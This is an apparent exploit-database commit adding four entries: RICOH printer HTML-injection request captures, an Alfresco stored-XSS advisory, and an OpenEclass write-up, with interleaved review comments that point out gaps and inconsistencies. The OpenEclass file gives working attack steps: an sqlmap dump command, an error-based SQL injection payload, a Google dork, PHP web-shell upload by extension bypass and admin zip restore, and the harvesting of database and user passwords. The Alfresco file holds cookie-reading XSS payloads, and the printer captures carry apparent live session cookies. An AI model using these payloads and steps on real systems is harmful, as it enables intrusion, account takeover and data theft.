DB: 2020-03-04
4 changes to exploits/shellcodes RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection Alfresco 5.2.4 - Persistent Cross-Site Scripting GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
parent
afe5797b88
commit
d85ad29bbc
5 changed files with 345 additions and 0 deletions
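--- a/exploits/hardware/webapps/48161.txt
+++ b/exploits/hardware/webapps/48161.txt
@@ -0,0 +1,73 @@
+# Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
+# Discovery by: Paulina Girón
+# Discovery Date: 2020-03-02
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re2/model/sp52s/sp52s.htm
+# Product Version: RICOH Aficio SP 5200S Printer
+# Vulnerability Type: Code Injection - HTML Injection
+
+# Steps to Produce the HTML Injection:
+
+#1.- HTTP POST Request 'adrsGetUser.cgi':
+
+POST /web/entry/es/address/adrsGetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 447
+Cache-Control: max-age=0
+Origin: http://xxx.xxx.xxx.xxx
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsList.cgi
+Accept-Encoding: gzip, deflate
+Accept-Language: es-ES,es;q=0.9
+Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
+Connection: close
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=13&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00005=ADRS_ENTRY_USER&00006=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00009=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+Date: Mon, 02 Mar 2020 15:15:59 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 15:15:59 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+
+
+#2.- HTTP POST Request 'adrsSetUser.cgi':
+
+POST /web/entry/es/address/adrsSetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 611
+Cache-Control: max-age=0
+Origin: http://xxx.xxx.xxx.xxx
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsGetUser.cgi
+Accept-Encoding: gzip, deflate
+Accept-Language: es-ES,es;q=0.9
+Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
+Connection: close
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00012&entryNameIn=prueba&entryDisplayNameIn=prueba&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+Date: Mon, 02 Mar 2020 15:17:10 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 15:17:10 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close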
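Review bot: The captured `adrsSetUser.cgi` request stores the plain value `entryNameIn=prueba` and both responses are shown as headers only, so nothing in this file shows markup being accepted or rendered unescaped, although the title claims HTML injection in that field. A reader defending these devices cannot tell which page reflects the name, which firmware was tested, or what to do about it; I would add header lines such as `# Tested firmware: <FIRMWARE_VERSION>`, `# Authentication: appears to require a logged-in session (the request carries risessionid/wimsesid cookies)` and `# Mitigation: HTML-encode address-book names on output and limit access to the printer's web interface`. The cookie values in the captures look like real session identifiers and should be masked the same way the host is. The same three points apply to 48164.txt (SP 5210SF), which uses `entryNameIn=test`.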
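--- a/exploits/hardware/webapps/48164.txt
+++ b/exploits/hardware/webapps/48164.txt
@@ -0,0 +1,73 @@
+# Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
+# Discovery by: Olga Villagran
+# Discovery Date: 2020-03-02
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/rc3/model/sp52s/sp52s.htm?lang=es
+# Product Version: RICOH Aficio SP 5210SF Printer
+# Vulnerability Type: Code Injection - HTML Injection
+
+# Steps to Produce the HTML Injection:
+
+#1.- HTTP POST Request 'adrsGetUser.cgi':
+
+POST /web/entry/en/address/adrsGetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 402
+Connection: close
+Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
+Upgrade-Insecure-Requests: 1
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=8&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER&00012=ADRS_ENTRY_USER
+
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+
+Date: Mon, 02 Mar 2020 22:22:44 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 22:22:44 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+
+#2.- HTTP POST Request 'adrsSetUser.cgi':
+
+
+POST /web/entry/en/address/adrsSetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsGetUser.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 607
+Connection: close
+Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
+Upgrade-Insecure-Requests: 1
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00005&entryNameIn=test&entryDisplayNameIn=test&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
+
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+
+Date: Mon, 02 Mar 2020 22:23:10 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 22:23:10 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close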
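--- a/exploits/php/webapps/48162.txt
+++ b/exploits/php/webapps/48162.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Alfresco 5.2.4 - Persistent Cross-Site Scripting
+# Date: 2020-03-02
+# Exploit Author: Romain LOISEL & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
+# Vendor Homepage: https://www.alfresco.com/
+# Software Link: https://www.alfresco.com/ecm-software
+# Version: Alfresco before 5.2.4
+# Tested on: 5.2.4
+# CVE : CVE-2020-8776, CVE-2020-8777, CVE-2020-8778
+# Security advisory: https://gitlab.com/snippets/1937042
+
+
+### Stored XSS n°1 - Document URL - CVE-2020-8776 (found by Alexandre ZANNI)
+
+Each file has a set of properties than can be edited by any authenticated user
+that have write access on the project or the file.
+
+The **URL** property of the file provided by the user is injected in the `href`
+attribute of the HTML link without a proper escaping.
+
+- Where? In URL property
+- Payload: `" onmouseover="alert(document.cookie)"`
+- Details: On the document explorer, the value is injected in a span tag. But on the detailed view of the file, it's inserted in the `href` attribute of a `a` tag. `http://` is prefixed before the payload provided by the user but can be bypassed. The generated vulnerable link will look like that:
+```html
+<a target="_blank" href="http://" onmouseover="alert(document.cookie)" "=" ">http://" onmouseover="alert(document.cookie)"</a>
+```
+- Privileges: It requires write privileges to store it, any user with read access can see it.
+- Steps to reproduce:
+1. Go to _Document Library_
+2. Upload a file or click _Edit properties_ on an existing file
+3. Enter the payload in the URL property
+4. Click on the file title to go on the detailed page of the file
+5. Hover the displayed link to trigger the XSS
+
+### Stored XSS n°2 - User profile photo upload / Document viewing - CVE-2020-8777 (found by Alexandre ZANNI)
+
+There is no file restriction for photo uploading in the user profile page.
+Then the profile picture can be seen in the browser.
+
+- Where? In user profile photo
+- Payload:
+```xml
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,200 200,200 200,0" fill="#FF6804" stroke="#000000"/>
+<script type="text/javascript">
+alert('XSS - Orange Cyberdefense');
+</script>
+</svg>
+```
+- Details: The XSS is not triggerred everywhere, only with the _View in browser_ feature.
+- Privileges: Any authenticated user can store it or trigger it.
+- Steps to reproduce:
+1. Go to your user profile page (`/share/page/user/<username>/profile`)
+2. In the _Photo_ section, click _Upload_ and upload the SVG payload file
+3. Use the document browser or any dashboard to find the uploaded file
+4. Click on the title to go to the detailed page of the file
+5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
+
+### Stored XSS n°3 - Generic file upload / Document viewing - CVE-2020-8778 (found by Romain LOISEL)
+
+This is the generic version of the previous XSS. Uploading dangerous file types
+is allowed and then they can be viewed to triggered the XSS. The difference
+between the two is that this one requires right access on a project to upload
+documents so the XSS is not exploitable with a read only account but the
+previous one can be exploited by any user as any user is allowed to have a
+profile photo.
+
+- Where? Uploading a document anywhere
+- Payload: any file type that can store and execute a JavaScript payload (eg. HTML, SVG, XML, etc.)
+- Details: The XSS is triggerred only with the _View in browser_ feature.
+- Privileges: Any authenticated user with write access to a project can store it and any user that have read access to the file or project can trigger it.
+- Steps to reproduce:
+1. Go to a project dashboard
+2. IClick _Upload_ and upload a dangerous file
+3. Use the document browser or any dashboard to find the uploaded file
+4. Click on the title to go to the detailed page of the file
+5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)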
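Review bot: The header contradicts itself about scope: `# Version: Alfresco before 5.2.4` excludes the very release named in the title and in `# Tested on: 5.2.4`, so a reader cannot tell whether 5.2.4 is vulnerable or is the first fixed build. It should either read `# Version: Alfresco <= 5.2.4` or name the fixed release, whichever the linked security advisory states. None of the three findings carries a remediation line; I would close each with one, for example `- Fix: attribute-encode the URL property and accept only http/https URLs` for CVE-2020-8776 and `- Fix: serve uploaded content with Content-Disposition: attachment and a restrictive Content-Security-Policy; limit profile photos to raster image types` for CVE-2020-8777 and CVE-2020-8778.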
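--- a/exploits/php/webapps/48163.txt
+++ b/exploits/php/webapps/48163.txt
@@ -0,0 +1,116 @@
+# Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
+# Google Dork: intext:"© GUnet 2003-2007"
+# Date: 2020-03-02
+# Exploit Author: emaragkos
+# Vendor Homepage: https://www.openeclass.org/
+# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
+# Version: 1.7.3 (2007)
+# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
+# CVE : -
+
+Older versions are also vulnerable.
+
+Source code:
+http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
+http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
+
+Setup instructions:
+http://download.openeclass.org/files/docs/1.7/Install.pdf
+
+Changelog:
+https://download.openeclass.org/files/docs/1.7/CHANGES.txt
+
+Manual:
+https://download.openeclass.org/files/docs/1.7/eClass.pdf
+
+############################################################################
+
+Unauthenticated Information Disclosure
+
+System info
+127.0.0.1/modules/admin/sysinfo
+(powered by phpSysInfo 2.0 that is also vulnerable)
+
+Web-App version info
+127.0.0.1/README.txt
+127.0.0.1/info/about.php
+127.0.0.1/upgrade/CHANGES.txt
+
+############################################################################
+
+(Authenticated - Requires student account) - Error-Based SQLi
+
+https://127.0.0.1/modules/agenda/myagenda.php?month=3&year=2020
+
+sqlmap -u "https://127.0.0.1/modules/agenda/myagenda.php?month=2&year=2020" --batch --dump
+
+---
+Parameter: month (GET)
+Type: error-based
+Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+Payload: month=5' AND (SELECT 9183 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9183=9183,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Hztw&year=2020'
+---
+
+Almost every parameter will be either error-based, boolean-based or time-based vulnerable.
+If you have a student account I recommend using this error-based SQLi because you will get all the database content really faster.
+If you dont have an account use the following exploit that exploits an unauthenticated time-based blind injection.
+It will definately be a slower proccess but you will get the administrator account pretty fast and move on with exploiting other authenticated vulnerabilities.
+https://www.exploit-db.com/exploits/48106
+
+############################################################################
+
+(Authenticated - Requires student account) - PHP upload file extension bypass
+If you have a student account you can bypass file extension restrictions and upload a PHP shell.
+Register as user if the application is configured to allow registrations or use an SQLi to find an account that already exists.
+Start looking for a class that you can submit an exercise as a student.
+Register in that class and navigate to submit you exercise.
+If you try to upload a .php file it will be renamed to .phps to prevent execution.
+You can upload your PHP shell by spoofing the extension simply by renaming your .php file to .php3 or .PhP
+Once you have uploaded it, open your course directory and then add "work" directory at the end
+Course link example: https://127.0.0.1/courses/CS101/
+Course link becomes: https://127.0.0.1/courses/CS101/work/
+Directory listing will most likely be enabled by default and you will be able to view the directories.
+Your shell will be in one of the multiple random alphanumeric directories that look like this /4a0c01h2nad9b/
+Final shell link will look like this: https://127.0.0.1/courses/CS101/work/4a0c01h2nad9b/shell.php3
+
+The same method works with "groups" if you cant find a class that supports submitting an exercise.
+https://127.0.0.1/modules/group/group.php
+
+############################################################################
+
+(Authenticated - Requires student account) - View assessments of other students
+If you have a student account you can view uploaded assessments from other students before or after the deadline that the professor has set.
+Find the course link you are interested in.
+https://127.0.0.1/courses/CS101
+Add "work" directory at the end
+https://127.0.0.1/courses/CS101/work/
+Directory listing will most likely be enabled by default and you will be able to view and download other students' uploaded assessments.
+
+############################################################################
+
+(Authenticated - Requires admin account) - Upload PHP files
+
+You have to login to the platform as an administrator or user with admin rights.
+You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the
+following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results.
+Once you have logged in as admin:
+1) Navigate to 127.0.0.1/modules/course_info/restore_course.php
+2) Upload your .php shell compressed in a .zip file
+3) Ignore the error message
+4) Your PHP file is now uploaded to 127.0.0.1/cources/tmpUnzipping/[your-shell-name].php
+
+############################################################################
+
+(Authenticated - Requires admin account) - phpMyAdmin Remote Access
+
+127.0.0.1/modules/admin/mysql
+phpMyAdmin 2.10.0.2 is installed by default and allows remote logins
+Once you have uploaded your shell can view the config.php file that contains the mysql password
+127.0.0.1/config/config.php
+
+############################################################################
+
+(Authenticated - Requires admin account) - Plaintext password storage
+
+When logged in as admin you can view all registered users credentials as plaintext.
+127.0.0.1/modules/admin/listusers.php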
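Review bot: The title and header describe only the `month` SQL injection, yet the body documents six further weaknesses (unauthenticated information disclosure, upload extension bypass, directory listing under `courses/<id>/work/`, admin zip upload, bundled phpMyAdmin, plaintext password storage), so anyone triaging from the title will underestimate the exposure. I would add a summary list of all findings under the header and a remediation line per section, e.g. `# Fix: cast month/year to integers and use bound parameters in myagenda.php`, `# Fix: allow-list upload extensions case-insensitively and disable script execution and directory indexes under courses/`, `# Fix: store passwords with a salted password hash`. The path in admin step 4 is spelled `cources/tmpUnzipping` while every other path in the file uses `courses/`; this is probably a typo and should be checked against the application.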
|
@ -42427,3 +42427,7 @@ id,file,description,date,author,type,platform,port
|
|||
48155,exploits/hardware/webapps/48155.py,"TP LINK TL-WR849N - Remote Code Execution",2020-03-02,"Elber Tavares",webapps,hardware,
|
||||
48158,exploits/hardware/webapps/48158.txt,"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)",2020-03-02,"Elber Tavares",webapps,hardware,
|
||||
48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,
|
||||
48161,exploits/hardware/webapps/48161.txt,"RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection",2020-03-03,"Paulina Girón",webapps,hardware,
|
||||
48162,exploits/php/webapps/48162.txt,"Alfresco 5.2.4 - Persistent Cross-Site Scripting",2020-03-03,"Alexandre ZANNI",webapps,php,
|
||||
48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,
|
||||
48164,exploits/hardware/webapps/48164.txt,"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection",2020-03-03,"Olga Villagran",webapps,hardware,
|
||||
|
|
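Review bot: The new row for 48162 credits only `"Alexandre ZANNI"`, but 48162.txt names `Romain LOISEL & Alexandre ZANNI` as authors and attributes CVE-2020-8778 to Romain LOISEL, so the author field should carry both names. The same row sets the platform column to `php` for Alfresco, which is a Java application; platform-filtered searches will probably miss it. The row for 48163 repeats the `'month' SQL Injection` title although that file covers several other findings, so the description column understates it as well.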